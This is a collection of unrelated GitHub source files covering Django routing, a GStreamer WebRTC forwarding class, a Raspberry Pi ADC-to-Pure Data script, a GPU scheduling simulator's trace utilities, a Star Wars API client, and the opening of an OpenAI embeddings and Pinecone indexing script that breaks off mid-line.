+{"seq_id":"26612500178","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('login/', views.login_user, name=\"login\"),\n    path(\"signup/\", views.signup_user, name=\"signup\"),\n    path(\"logout/\", views.logout_user, name=\"logout\"),\n    \n    path(\"forms/\", views.dashboard_forms, name=\"forms\"),\n    path(\"forms/\", views.dashboard_new_form, name=\"form-add\"),\n    path('forms/update/', views.dashboard_update_form, name='form-update' ),\n    path(\"forms-inbox/\", views.dashboard_form_inbox, name=\"forms-inbox\"),\n    path(\"forms-inbox/roles/\", views.get_role_users, name=\"forms-inbox-roles\"),\n\n\n    path(\"forms-admin/\", views.dashboard_forms_admin, name=\"forms-admin\"),\n    path(\"forms-admin/update\", views.dashboard_forms_admin_update, name=\"forms-admin-update\"),\n    path(\"forms-admin/new\", views.new_form_admin, name=\"newform\"),\n\n    \n    path(\"\", views.dashboard, name=\"dashboard\")\n]","repo_name":"yazdan2014/Easy-Connection-Website","sub_path":"EasyConnectionSoftware/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36485884247","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter(name='is_item_id_in_list')\ndef is_item_id_in_list(item_list, item_id):\n    return any(int(item.get('item_id')) == item_id for item in item_list)\n\n\n@register.simple_tag(name='find_quantity')\ndef find_quantity(item_list, item_id, date, time):\n    products = 0\n    for item in item_list:\n        if str(item.get('item_id')) == str(item_id):\n            if int(item_id) > 23:\n                if str(item.get('date')) == str(date):\n                    return len(time)\n                elif date == \"\":\n                    products += item.get('quantity')\n                else:\n                    continue\n            else:\n                return item.get('quantity')\n    return products\n\n@register.simple_tag(name='find_item_subtotal')\ndef 
find_item_subtotal(item_list, item_id):\n for item in item_list:\n if str(item.get('item_id')) == str(item_id):\n return item.get('item_subtotal')\n return 0","repo_name":"ryanmcnally93/project-four-ascension","sub_path":"products/templatetags/custom_filters.py","file_name":"custom_filters.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16263790233","text":"import asyncio\nfrom sfu.media import OutputMedia\nfrom sfu.participant import WebsocketParticipant\n\nfrom gi.repository import Gst\nfrom sfu.gst_utils import link_many\nfrom gi.repository import GstWebRTC\nfrom gi.repository import GstSdp\nfrom sfu.gst_utils import send_eos_and_wait, wait_for_pending_state_none\nimport threading\nimport time\n\n\nclass WebrtcOutput(OutputMedia):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.media_pipeline = kwargs['media_pipeline']\n ws = kwargs['ws']\n participant_id = kwargs['participant_id']\n\n self.participant = WebsocketParticipant(participant_id=participant_id)\n self.add_participant_handler()\n self.participant.set_ws(ws)\n self.input = None\n self.webrtcbin = None\n self.elements = []\n self.pipeline = None\n self.signal_connections = []\n self.tee_pad_links = []\n\n def add_participant_handler(self):\n class Handler:\n async def handle_payload(payload):\n try:\n media_id = payload['media_id']\n if media_id != self.media_id:\n return\n except KeyError:\n return\n\n try:\n payload_type = payload['type']\n except KeyError:\n return\n\n if payload_type == 'answer':\n self.handle_answer(payload)\n return\n\n if payload_type == 'ice_candidate':\n self.handle_remote_ice_candidate(payload)\n return\n\n async def handle_close():\n await self.media_pipeline.remove_output_media(self)\n\n self.participant.add_handler(Handler)\n\n def set_input_media(self, input_obj):\n self.input = input_obj\n\n def get_input_media(self):\n return self.input\n\n async def add_to_pipeline(self, pipeline):\n print('add to pipeline')\n\n self.webrtcbin = Gst.ElementFactory.make('webrtcbin')\n pipeline.add(self.webrtcbin)\n self.webrtcbin.set_property('stun-server', 'stun://stun.l.google.com:19302')\n self.signal_connections.extend([\n self.webrtcbin.connect('on-negotiation-needed', self.on_negotiation_needed),\n self.webrtcbin.connect('on-ice-candidate', self.on_ice_candidate),\n ])\n\n try:\n tees = [t[1] async for t in self.input.get_tees()]\n except Exception as e:\n raise e\n\n print('got tees')\n\n for t in tees:\n queue = Gst.ElementFactory.make('queue')\n queue.set_property('leaky', 1)\n queue.set_property('silent', True)\n pipeline.add(queue)\n tee_pad = t.get_request_pad('src_%u')\n queue_pad = queue.get_static_pad('sink')\n tee_pad.link(queue_pad)\n self.tee_pad_links.append((t, tee_pad, queue_pad))\n link_many(queue, self.webrtcbin)\n queue.set_state(Gst.State.PLAYING)\n self.elements.append(queue)\n\n self.webrtcbin.set_state(Gst.State.PLAYING)\n\n self.pipeline = pipeline\n\n def on_negotiation_needed(self, element):\n promise = Gst.Promise.new_with_change_func(self.on_offer_created, element)\n element.emit('create-offer', None, promise)\n\n def on_offer_created(self, promise, element):\n\n promise.wait()\n reply = promise.get_reply()\n offer = reply.get_value('offer')\n sdp_text = offer.sdp.as_text()\n\n msg = {\n 'media_id': self.media_id,\n 'type': 'offer',\n 'sdp': sdp_text,\n }\n if offer.type != GstWebRTC.WebRTCSDPType.OFFER:\n return\n\n set_local_description_promise = 
Gst.Promise.new()\n        element.emit('set-local-description', offer, set_local_description_promise)\n        # wait on the promise just passed to set-local-description; the offer promise was already awaited above\n        set_local_description_promise.wait()\n        loop = asyncio.new_event_loop()\n        try:\n            loop.run_until_complete(self.participant.send_payload(msg))\n        except Exception:\n            pass\n\n    def on_ice_candidate(self, element, mlineindex, candidate):\n\n        payload = {\n            'media_id': self.media_id,\n            'type': 'ice_candidate',\n            'ice': {'candidate': candidate, 'sdpMLineIndex': mlineindex}\n        }\n        loop = asyncio.new_event_loop()\n        try:\n            loop.run_until_complete(self.participant.send_payload(payload))\n        except Exception:\n            pass\n\n    def on_new_transceiver(self, el, trans):\n        # trans.direction = GstWebRTC.WebRTCRTPTransceiverDirection.SENDONLY\n        pass\n\n    def handle_remote_ice_candidate(self, payload):\n        ice = payload['ice']\n        candidate = ice['candidate']\n        sdpmlineindex = ice['sdpMLineIndex']\n        self.webrtcbin.emit('add-ice-candidate', sdpmlineindex, candidate)\n\n    def handle_answer(self, payload):\n        sdp = payload['sdp']\n        res, sdpmsg = GstSdp.SDPMessage.new()\n        GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg)\n        answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg)\n\n        def did_set_remote_description(prom):\n            pass\n\n        promise = Gst.Promise.new_with_change_func(did_set_remote_description)\n        self.webrtcbin.emit('set-remote-description', answer, promise)\n\n    async def handle_payload(self, payload):\n        action = payload['action']\n        if action == 'ice_candidate':\n            self.handle_remote_ice_candidate(payload)\n        elif action == 'answer':\n            self.handle_answer(payload)\n\n    async def remove_from_pipeline(self, pipeline):\n        try:\n            if self.webrtcbin:\n                for c in self.signal_connections:\n                    self.webrtcbin.disconnect(c)\n\n            for (tee, tee_pad, el_pad) in self.tee_pad_links:\n                tee_pad.unlink(el_pad)\n                tee.release_request_pad(tee_pad)\n\n            def set_to_null(element):\n                element.set_state(Gst.State.NULL)\n\n            def wait_for_null(element):\n                (_, state, _) = element.get_state(0.1)\n                tries = 0\n                while state != Gst.State.NULL:\n                    tries += 1\n                    time.sleep(0.1)\n                    if tries == 3:\n                        break\n                    (_, state, _) = element.get_state(0.1)\n\n            for e in self.elements:\n                e.unlink(self.webrtcbin)\n                t = threading.Thread(target=set_to_null, args=[e])\n                t.start()\n                wait_for_null(e)\n\n            if self.webrtcbin:\n                t = threading.Thread(target=set_to_null, args=[self.webrtcbin])\n                t.start()\n                wait_for_null(self.webrtcbin)\n\n            for e in self.elements:\n                self.pipeline.remove(e)\n\n            if self.webrtcbin:\n                pipeline.remove(self.webrtcbin)\n\n        except Exception:\n            pass\n\n    async def cleanup(self):\n        await self.participant.cleanup()\n","repo_name":"keepingitneil/gstreamer-example","sub_path":"sfu/webrtc_output.py","file_name":"webrtc_output.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"35853922363","text":"#!/usr/bin/python\n\nimport os # import os for sending messages to PD\nimport spidev # import the spidev module\nimport time # import time for the sleep function\nimport socket\n\n# Open SPI bus\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\nIP=\"127.0.0.1\"\nPORT=9000\naddr=(IP, PORT)\nEOL=';\\n'\nsock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n\ndef send2Pd(message=''):\n    # Send a message to Pd; UDP payloads must be bytes on Python 3\n    msg = \"hello \" + message\n    sock.sendto((msg + EOL).encode('utf-8'), addr)\n\ndef readadc(channel):\n    if channel > 7 or channel < 0:\n        return -1\n\n    # spi.xfer2 sends three bytes and returns three bytes:\n    # byte 1: the start bit (always 0x01)\n    # byte 2: configure bits, 
see MCP3008 datasheet table 5-2\n    # byte 3: don't care\n    r = spi.xfer2([1, 8 + channel << 4, 0])\n\n    # Three bytes are returned; the data (0-1023) is 10 bits wide: the\n    # low 2 bits of byte 2 plus all of byte 3 (datasheet figure 6-1)\n    v = ((r[1] & 3) << 8) + r[2]\n\n    return v\n\nwhile True:\n    values = [0]*8\n    for i in range(8):\n        values[i] = readadc(i)\n        message = str(i) + ' ' + str(values[i]) + ';' # make a string for use with Pdsend\n        send2Pd(message)\n# consider creating a message that has all values in one string rather than separate messages\n#    print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n    time.sleep(0.2)\n","repo_name":"haigarmen/loppi","sub_path":"lop2osc.py","file_name":"lop2osc.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71462447593","text":"import profile\nimport sys\nimport os\nimport logging\nimport datetime\nimport pandas as pd\nfrom job import Job, Trace\nfrom policy import (\n    ShortestJobFirst,\n    FirstInFirstOut,\n    ShortestRemainingTimeFirst,\n    QuasiShortestServiceFirst,\n    Lucid,\n    Tiresias,\n)\nfrom profiler import LeastGPUFirstProfiler\n\nsys.path.append(\"..\")\n\nPROFILER_ENABLED_SCHEDULERS = [\"lucid\"]\n\n\ndef simulate_vc(trace, vc, placement, log_dir, policy, logger, start_ts, *args):\n    if policy == \"sjf\":\n        scheduler = ShortestJobFirst(trace, vc, placement, log_dir, logger, start_ts)\n    elif policy == \"fifo\":\n        scheduler = FirstInFirstOut(trace, vc, placement, log_dir, logger, start_ts)\n    elif policy == \"srtf\":\n        scheduler = ShortestRemainingTimeFirst(trace, vc, placement, log_dir, logger, start_ts)\n    elif policy == \"qssf\":\n        scheduler = QuasiShortestServiceFirst(trace, vc, placement, log_dir, logger, start_ts, args[0])\n    elif policy == \"lucid\":\n        scheduler = Lucid(trace, vc, placement, log_dir, logger, start_ts, args[0], args[1])\n    elif policy == \"tiresias\":\n        scheduler = Tiresias(trace, vc, placement, log_dir, logger, start_ts)\n    scheduler.simulate()\n    logger.info(f\"Finish {vc.vc_name}\")\n    return True\n\n\ndef trace_profile(trace, scale, time_limit, profiler_factor, placement, log_dir, logger, start_ts):\n    profiler = LeastGPUFirstProfiler(trace, scale, time_limit, profiler_factor, placement, log_dir, logger, start_ts)\n    profiler.profile()\n    trace.reset_trace()\n    logger.info(\"Finish Profiling\")\n    return trace\n\n\ndef get_available_schedulers():\n    return [\"fifo\", \"sjf\", \"srtf\", \"qssf\", \"lucid\", \"tiresias\"]\n\n\ndef get_sweep_schedulers():\n    return [\"fifo\", \"sjf\", \"srtf\", \"qssf\", \"tiresias\"]\n\n\ndef get_available_placers():\n    return [\"random\", \"consolidate\", \"consolidateFirst\"]\n\n\ndef trace_process(dir, date_range, read_full):\n    start = \"2020-04-01 00:00:00\"\n    if read_full == False:\n        df = pd.read_csv(\n            dir + \"/cluster_log.csv\",\n            parse_dates=[\"submit_time\"],\n            usecols=[\"job_id\", \"user\", \"vc\", \"jobname\", \"gpu_num\", \"cpu_num\", \"state\", \"submit_time\", \"duration\"],\n        )\n    else:\n        df = pd.read_csv(\n            dir + \"/cluster_full_log.csv\",\n            parse_dates=[\"submit_time\"],\n            usecols=[\n                \"job_id\",\n                \"user\",\n                \"vc\",\n                \"jobname\",\n                \"gpu_num\",\n                \"cpu_num\",\n                \"state\",\n                \"submit_time\",\n                \"duration\",\n                \"dataset\",\n                \"model\",\n                \"batchsize\",\n                \"amp\",\n                \"speed\",\n                \"gpu_util\",\n                \"gmem_util\",\n                \"gmem\",\n            ],\n        )\n    # Consider gpu jobs only\n    df = df[df[\"gpu_num\"] > 0]\n\n    # VC filter\n    vc_df = pd.read_csv(dir + 
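# --- Editor's note: worked example of the MCP3008 bit arithmetic above; the response
# bytes below are invented for illustration. The ADC returns 10 bits split across the
# last two response bytes: the low 2 bits of byte 2 are the sample's high bits and
# byte 3 holds its low 8 bits. ---
r = [0x00, 0x02, 0xBC]              # a hypothetical response encoding the value 700
value = ((r[1] & 3) << 8) + r[2]    # (0b10 << 8) + 0b10111100 = 512 + 188
assert value == 700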
\"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df = df[df[\"submit_time\"] >= pd.Timestamp(start)]\n df[\"submit_time\"] = df[\"submit_time\"].apply(lambda x: int(datetime.datetime.timestamp(pd.Timestamp(x))))\n\n # Normalizing\n df[\"submit_time\"] = df[\"submit_time\"] - df.iloc[0][\"submit_time\"]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n\n # Slicing simulation part\n begin = (pd.Timestamp(date_range[0]) - pd.Timestamp(start)).total_seconds()\n end = (pd.Timestamp(date_range[1]) - pd.Timestamp(start)).total_seconds()\n df = df[(df[\"submit_time\"] >= begin) & (df[\"submit_time\"] <= end)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df.reset_index(inplace=True, drop=True)\n\n return df, begin\n\n\ndef trace_real_process(dir):\n df = pd.read_csv(\n dir + \"/cluster_full_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"job_id\",\n \"user\",\n \"vc\",\n \"jobname\",\n \"gpu_num\",\n \"cpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n df[\"submit_time\"] = df[\"submit_time\"].astype(float)\n df[\"submit_time\"] = df[\"submit_time\"].astype(int)\n df.reset_index(inplace=True, drop=True)\n\n return df, 0\n\n\ndef trace_pollux_process(dir, idx):\n df = pd.read_csv(\n f\"{dir}/cluster_full_log_{idx}.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"job_id\",\n \"user\",\n \"vc\",\n \"jobname\",\n \"gpu_num\",\n \"cpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n df[\"submit_time\"] = df[\"submit_time\"].astype(float)\n df[\"submit_time\"] = df[\"submit_time\"].astype(int)\n df.reset_index(inplace=True, drop=True)\n\n return df, 0\n\n\ndef trace_philly_process(dir, date_range, read_full):\n start = \"2017-10-01 00:00:00\"\n if read_full == False:\n df = pd.read_csv(\n dir + \"/cluster_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\"user\", \"vc\", \"jobname\", \"gpu_num\", \"state\", \"submit_time\", \"duration\"],\n )\n else:\n df = pd.read_csv(\n dir + \"/cluster_full_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"user\",\n \"vc\",\n \"job_id\",\n \"gpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n # Consider gpu jobs only\n df = df[df[\"gpu_num\"] > 0]\n df.sort_values(by=\"submit_time\", inplace=True)\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = 
df[df[\"vc\"].isin(vc_list)]\n\n df = df[df[\"submit_time\"] >= pd.Timestamp(start)]\n df[\"submit_time\"] = df[\"submit_time\"].apply(lambda x: int(datetime.datetime.timestamp(pd.Timestamp(x))))\n\n df.rename(columns={\"jobname\": \"job_id\"}, inplace=True)\n df[\"state\"] = df[\"state\"].replace(\"Pass\", \"COMPLETED\")\n df[\"state\"] = df[\"state\"].replace(\"Failed\", \"FAILED\")\n df[\"state\"] = df[\"state\"].replace(\"Killed\", \"CANCELLED\")\n\n # Normalizing\n df[\"submit_time\"] = df[\"submit_time\"] - df.iloc[0][\"submit_time\"]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n\n # Slicing simulation part\n begin = (pd.Timestamp(date_range[0]) - pd.Timestamp(start)).total_seconds()\n end = (pd.Timestamp(date_range[1]) - pd.Timestamp(start)).total_seconds()\n df = df[(df[\"submit_time\"] >= begin) & (df[\"submit_time\"] <= end)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df.reset_index(inplace=True, drop=True)\n\n return df, begin\n\n\ndef trace_parser(df):\n trace = Trace()\n\n for _, series in df.iterrows():\n trace.append_job(Job(series))\n trace.sort_jobs(\"submit_time\")\n return trace\n\n\ndef logger_init(file):\n logger = logging.getLogger()\n handler_file = logging.FileHandler(f\"{file}.log\", \"w\")\n handler_stream = logging.StreamHandler() # sys.stdout\n\n logger.setLevel(logging.INFO)\n handler_file.setLevel(logging.INFO)\n handler_stream.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"%(asctime)s | %(processName)s | %(message)s\", datefmt=\"%Y %b %d %H:%M:%S\")\n handler_file.setFormatter(formatter)\n handler_stream.setFormatter(formatter)\n\n logger.addHandler(handler_file)\n logger.addHandler(handler_stream)\n\n return logger\n\n\ndef cluster_concatenate(policy, placer, log_dir, dir):\n prefix = f\"{policy}_{placer}\"\n if not os.path.exists(log_dir + \"/all\"):\n os.mkdir(log_dir + \"/all\")\n\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vcs = vc_df.index.to_list()\n\n \"\"\"Log\"\"\"\n cluster_log = pd.DataFrame()\n for vc in vcs:\n vc_log = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_log.csv\")\n cluster_log = pd.concat([cluster_log, vc_log])\n cluster_log.sort_values(by=\"submit_time\", inplace=True)\n cluster_log.to_csv(f\"{log_dir}/all/{prefix}_all_log.csv\", index=False)\n\n \"\"\"Seq\"\"\"\n cluster_seq = pd.DataFrame()\n add_list = [\n \"total_gpu_num\",\n \"idle_gpu_num\",\n \"pending_gpu_num\",\n \"running_gpujob_num\",\n \"pending_gpujob_num\",\n \"pending_job_num_less_8\",\n \"total_node_num\",\n \"consolidate_node_num\",\n \"shared_node_num\",\n ]\n for vc in vcs:\n vc_seq = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_seq.csv\")\n if len(cluster_seq) == 0:\n cluster_seq = vc_seq\n continue\n cluster_seq[add_list] = cluster_seq[add_list] + vc_seq[add_list]\n cluster_seq.dropna(inplace=True)\n cluster_seq = cluster_seq.astype(int)\n cluster_seq[\"gpu_utilization\"] = (\n (cluster_seq[\"total_gpu_num\"] - cluster_seq[\"idle_gpu_num\"]) / cluster_seq[\"total_gpu_num\"]\n ).round(3)\n cluster_seq.to_csv(f\"{log_dir}/all/{prefix}_all_seq.csv\", index=False)\n\n\ndef cluster_analysis(placer, log_dir, dir):\n \"\"\"Generate Algorithm Comparsion CSV\"\"\"\n # ignore_warm_up = start_ts + 7*24*3600\n\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vcs = vc_df.index.to_list()\n vcs.append(\"all\")\n\n files = os.listdir(f\"{log_dir}/all\")\n prefix = set()\n for file in files:\n policy = 
file.split(\"_\")[0]\n placer = file.split(\"_\")[1]\n prefix.add(f\"{policy}_{placer}\")\n prefix_list = sorted(list(prefix))\n\n # prefix_list = []\n # for i in get_available_schedulers():\n # prefix = f\"{i}_{placer}\"\n # prefix_list.append(prefix)\n\n jct_avg = pd.DataFrame()\n que_avg = pd.DataFrame()\n for prefix in prefix_list:\n for vc in vcs:\n vc_log = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_log.csv\")\n # vc_log = vc_log[vc_log['submit_time'] > ignore_warm_up]\n jct_avg.at[vc, prefix] = vc_log[\"jct\"].mean()\n que_avg.at[vc, prefix] = vc_log[\"queue\"].mean()\n\n jct_avg = jct_avg.astype(int)\n que_avg = que_avg.astype(int)\n jct_avg.to_csv(f\"{log_dir}/jct_avg_{placer}.csv\")\n que_avg.to_csv(f\"{log_dir}/que_avg_{placer}.csv\")\n\n\ndef get_trace(experiment_name, trace_dir, read_full, idx=None):\n if \"Philly\" in experiment_name:\n trace_range = (\"2017-10-01 00:00:00\", \"2017-10-07 23:59:00\")\n trace_df, start_ts = trace_philly_process(trace_dir, trace_range, read_full)\n elif \"Pollux\" in experiment_name:\n trace_df, start_ts = trace_pollux_process(trace_dir, idx)\n else:\n if \"Sept\" in experiment_name:\n trace_range = (\"2020-09-01 00:00:00\", \"2020-09-26 23:59:00\")\n trace_df, start_ts = trace_process(trace_dir, trace_range, read_full)\n elif \"July\" in experiment_name:\n trace_range = (\"2020-07-01 00:00:00\", \"2020-07-31 23:59:00\")\n trace_df, start_ts = trace_process(trace_dir, trace_range, read_full)\n else:\n raise ValueError\n\n return trace_df, start_ts\n\n\ndef profiler_config(experiment_name, vc_dict):\n cluster = experiment_name.split(\"_\")[0]\n profile_scale = {\"Venus\": 2, \"Philly\": 2}\n profile_time = {\"Venus\": 200, \"Philly\": 80}\n profile_factor = {\"Venus\": 4, \"Philly\": 2}\n\n # Basic Config\n scale, time, factor = profile_scale[cluster], profile_time[cluster], profile_factor[cluster]\n if cluster == \"Philly\":\n vc_dict[\"philly\"] -= scale\n elif cluster == \"Venus\":\n vc_dict[\"vc8Gr\"] -= 1\n vc_dict[\"vcefl\"] -= 1\n # vc_dict[\"vcYVn\"] -= 1 # For elastic scaling\n return vc_dict, scale, time, factor\n\n\ndef check_profiler_scale_available(experiment_name, scale, vc_dict, prof_locate_vc=None):\n # Use only for debug\n default_vc = {\n \"Venus\": \"vc8Gr\",\n \"Saturn\": \"vcqdr\",\n \"Philly\": \"philly\",\n }\n cluster = experiment_name.split(\"_\")[0]\n\n if not prof_locate_vc:\n vc = default_vc[cluster]\n\n if scale <= vc_dict[vc]:\n return vc\n else:\n raise ValueError(\"Profile Node Scale Exceed VC Capacity\")\n\n\nif __name__ == \"__main__\":\n files = os.listdir(f\"log/Venus_Sept/all\")\n prefix = set()\n for file in files:\n policy = file.split(\"_\")[0]\n placer = file.split(\"_\")[1]\n prefix.add(f\"{policy}_{placer}\")\n prefix_list = sorted(list(prefix))\n print(prefix_list)\n","repo_name":"S-Lab-System-Group/Lucid","sub_path":"simulation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"72"} +{"seq_id":"27173800772","text":"import requests\nimport json\n\ndef getAllPages(url):\n \"\"\"\n When there are multiple pages pertaining to a single list of objects,\n this function loads in all of the pages and extends the list. For example,\n in swapi.co, there are 87 characters in the Star Wars universe. 
Because swapi.co\n only returns 10 items at a time, getAllPages makes 9 requests.\n \"\"\"\n done = False\n results = []\n while not done:\n # print(\"Requesting %s\" % (url))\n r = requests.get(url)\n page = json.loads(r.content)\n items = page[\"results\"]\n # print(\"Retrieved %d items\" % (len(items)))\n results += items\n if page[\"next\"]:\n url = page[\"next\"]\n else:\n done = True\n return results\n\ndef getItem(url):\n \"\"\"\n Returns any single item with a url as a dictionary.\n \"\"\"\n r = requests.get(url)\n item = json.loads(r.content)\n return item\n\ndef printItems(lst, key):\n \"\"\"\n Assigns sequential integers to each item in a list, printing the key attribute\n of each item.\n \"\"\"\n idx = 1\n for item in lst:\n print(\"%d. %s\" % (idx, item[key]))\n idx = idx + 1\n\ndef getItemList(urls, name):\n \"\"\"\n Requests each individual url, taking their responses and putting them in a list.\n It also prints an indexed list of the resources' name attributes.\n \"\"\"\n itemList = []\n for url in urls:\n item = getItem(url)\n itemList.append(item)\n printItems(itemList, name)\n return itemList\n\ndef printAttributes(item):\n \"\"\"\n Takes the non-list attributes of a dictionary and prints them out in a formatted\n manner. When printing the opening_crawl attribute of the \"film\" items, printAttributes\n adds extra newlines.\n \"\"\"\n for key in item:\n value = str(item[key])\n if key == 'opening_crawl':\n value = \"\\n\" + value + \"\\n\"\n if type(item[key]) is not list:\n print(\"%s: %s\" % (key.title(), value))\n\ndef promptForItem(items, swType):\n \"\"\"\n The innermost while loop of swexplore. It prompts the user to explore a different\n item or to return to a previous menu.\n \"\"\"\n done = False\n while not done:\n itemChoice = input(\"\\n==> Enter the number of a %s to explore, or select B to go back: \" % swType)\n print('')\n try:\n if itemChoice.lower() == 'b':\n done = True\n else:\n item = items[int(itemChoice) - 1]\n printAttributes(item)\n except:\n print('Invalid entry: ' + itemChoice + '. 
Try again!')\n","repo_name":"aaron-galper/apiproject","sub_path":"swfunc.py","file_name":"swfunc.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30214283570","text":"import os\nimport pinecone\nimport argparse\nimport openai\nimport pandas as pd\nfrom pprint import pprint\n\n# Create an ArgumentParser object\nparser = argparse.ArgumentParser()\n\n# Add an argument with a flag and a name\nparser.add_argument(\"--file\", default=\"./output/default/contents.csv\", help=\"Specify the path to the CSV\")\nparser.add_argument(\"--embedding_type\", default=\"csv\", choices=[\"csv\", \"pinecone\"], help=\"Format to save embeddings in\")\nparser.add_argument(\"--out\", default=\"./output/default/embeddings.csv\", help=\"Specify the filename to save the embeddings\")\nparser.add_argument(\"--pinecone_mode\", default=\"replace\", choices=[\"upsert\", \"replace\"], help=\"Specify the mode to upsert or replace embeddings in Pinecone index\")\nparser.add_argument(\"--pinecone_index\", default=\"default\", help=\"Pinecone Index\")\nparser.add_argument(\"--pinecone_namespace\", default=\"content\", help=\"Pinecone Namespace\")\nargs = parser.parse_args()\n\nDOC_EMBEDDINGS_MODEL = \"text-embedding-ada-002\"\nEMBEDDING_BATCH_SIZE = 1000\nPINECONE_REGION=\"us-east1-gcp\"\nPINECONE_DIMENSION_SIZE=1536\nPINECONE_METRIC=\"euclidean\"\nPINECONE_POD_TYPE=\"p1\"\nPINECONE_BATCH_SIZE = 100\n\ndef load_content_dataframe(filename):\n df = pd.read_csv(filename)\n df = df.set_index([\"id\"])\n print(f\"{len(df)} rows in the data.\")\n\n # drop rows with empty content\n df = df.dropna(subset=[\"content\"])\n print(f\"{len(df)} rows with content.\")\n\n sampleSize = 5 if len(df) >=5 else len(df)\n sample = df.sample(sampleSize)\n print(\"Sample (5 rows)\", sample)\n return df\n\ndef get_embedding(text: str, model: str) -> list[float]:\n return openai.Embedding.create(\n model=model,\n input=text\n )\n\ndef get_doc_embedding(text: str) -> list[float]:\n result = get_embedding(text, DOC_EMBEDDINGS_MODEL)\n return result[\"data\"][0][\"embedding\"]\n\ndef compute_doc_embeddings_old(df: pd.DataFrame) -> dict[tuple[str], list[float]]:\n \"\"\"\n Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n \n Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n \"\"\"\n print('Generating the embeddings...')\n return {\n idx: get_doc_embedding(r.content.replace(\"\\n\", \" \")) if isinstance(r.content, str) else \"\"\n for idx, r in df.iterrows()\n }\n\ndef compute_doc_embeddings(df: pd.DataFrame) -> dict[tuple[str], list[float]]:\n \"\"\"\n Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n \n Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n \"\"\"\n print('Generating the embeddings...')\n results = {}\n batch_size = EMBEDDING_BATCH_SIZE\n processed = 0\n total = len(df)\n for i in range(0, total, batch_size):\n batch_rows = df[i:i+batch_size]\n batch_texts = [r.content.replace(\"\\n\", \" \") if isinstance(r.content, str) and r.content != \"\" else \"\" for _, r in batch_rows.iterrows()]\n batch_embeddings = get_embedding(batch_texts, DOC_EMBEDDINGS_MODEL)\n for idx, embedding in zip(batch_rows.index, batch_embeddings[\"data\"]):\n results[idx] = embedding[\"embedding\"]\n processed += batch_size\n print(f\"Processed embeddings for 
